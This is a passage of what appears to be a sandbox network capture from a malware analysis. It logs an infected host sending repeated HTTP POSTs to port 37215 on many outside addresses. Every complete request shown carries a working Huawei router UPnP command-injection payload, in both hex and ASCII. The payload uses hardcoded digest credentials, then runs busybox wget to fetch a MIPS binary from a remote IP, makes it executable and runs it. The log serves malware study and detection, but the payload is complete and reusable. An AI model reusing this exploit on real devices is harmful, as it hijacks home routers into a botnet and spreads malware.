2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            860192.168.2.1335420156.71.124.7037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.861460924 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            861192.168.2.1357532156.34.17.18437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.862437963 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            862192.168.2.133764241.14.234.21237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.863236904 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            863192.168.2.1347112156.213.216.10537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.864253044 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            864192.168.2.1338730156.8.50.6937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.865200996 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            865192.168.2.1354502156.239.132.11537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.866110086 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            866192.168.2.1352678197.121.202.2537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.867036104 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            867192.168.2.1340972197.16.236.17337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.868091106 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            868192.168.2.133924441.168.51.17437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.869004011 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            869192.168.2.1358204197.36.79.4937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.869779110 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            870192.168.2.1356808156.103.106.20737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.870630026 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
